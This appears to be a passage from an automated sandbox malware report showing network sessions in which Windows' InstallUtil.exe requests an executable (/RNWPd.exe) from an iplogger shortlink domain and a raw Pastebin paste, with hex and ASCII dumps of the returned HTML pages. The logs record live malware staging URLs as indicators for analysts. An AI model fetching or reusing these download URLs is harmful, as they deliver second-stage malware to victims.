                          2024-09-12 20:01:18 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                          Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                          2024-09-12 20:01:18 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.849716188.114.96.34436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:18 UTC65OUTGET /RNWPd.exe HTTP/1.1
                          Host: yip.su
                          Connection: Keep-Alive
                          2024-09-12 20:01:19 UTC891INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          memory: 0.42901611328125
                          expires: Thu, 12 Sep 2024 20:01:19 +0000
                          strict-transport-security: max-age=604800
                          strict-transport-security: max-age=31536000
                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                          x-frame-options: SAMEORIGIN
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Last-Modified: Thu, 12 Sep 2024 20:01:19 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=63anGDsJstsHSjILUBzwnqA4VGUPs1fpDTB95P6z7YtYIO3BLgAcBdNjCT1q8JtSBktY3zcqaViSFGf1sL5wSkRaroyIZHXmUiExYBl3hWfZTW44KW18rNM%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c227d1d5e2bc46b-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-09-12 20:01:19 UTC478INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                          Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                          2024-09-12 20:01:19 UTC1369INData Raw: 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61
                          Data Ascii: ent="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="og:ima
                          2024-09-12 20:01:19 UTC1369INData Raw: 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 34 73 3b 61 6e 69 6d
                          Data Ascii: 8bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.4s;anim
                          2024-09-12 20:01:19 UTC1369INData Raw: 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f 79 2e 73 70 6c 69 63
                          Data Ascii: a.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_y.splic
                          2024-09-12 20:01:19 UTC1369INData Raw: 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70
                          Data Ascii: rapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-radius:3p
                          2024-09-12 20:01:19 UTC1369INData Raw: 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e 79
                          Data Ascii: uto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="domain">y
                          2024-09-12 20:01:19 UTC147INData Raw: 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: on='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                          2024-09-12 20:01:19 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.849717104.20.4.2354436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:24 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-09-12 20:01:24 UTC222INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Server: cloudflare
                          CF-RAY: 8c227d3f4cb54243-EWR
                          2024-09-12 20:01:24 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2024-09-12 20:01:24 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                          Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                          2024-09-12 20:01:24 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                          Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                          2024-09-12 20:01:24 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                          Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                          2024-09-12 20:01:24 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.849718188.114.96.34436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:24 UTC65OUTGET /RNWPd.exe HTTP/1.1
                          Host: yip.su
                          Connection: Keep-Alive
                          2024-09-12 20:01:25 UTC910INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          memory: 0.36197662353515625
                          expires: Thu, 12 Sep 2024 20:01:25 +0000
                          strict-transport-security: max-age=604800
                          strict-transport-security: max-age=31536000
                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                          x-frame-options: SAMEORIGIN
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Last-Modified: Thu, 12 Sep 2024 20:01:25 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KNv8GDUOf4AeIqk3FxJ9ih6RM1Quo2A%2F2p5TjNxKVySrPo0TOJ%2Fr%2BS4cc8RO0SgrrMTVbHaqBBsv29oVSl%2F5Uh2ztlq%2F%2BYC%2BXK17serQDXHg%2FHIpVTngV6g%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c227d43b82a43fb-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-09-12 20:01:25 UTC459INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                          Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                          2024-09-12 20:01:25 UTC1369INData Raw: 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65
                          Data Ascii: revisit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><me
                          2024-09-12 20:01:25 UTC1369INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74
                          Data Ascii: ackground-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animat
                          2024-09-12 20:01:25 UTC1369INData Raw: 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64
                          Data Ascii: igator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.ind
                          2024-09-12 20:01:25 UTC1369INData Raw: 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75
                          Data Ascii: script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:au
                          2024-09-12 20:01:25 UTC1369INData Raw: 65 69 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 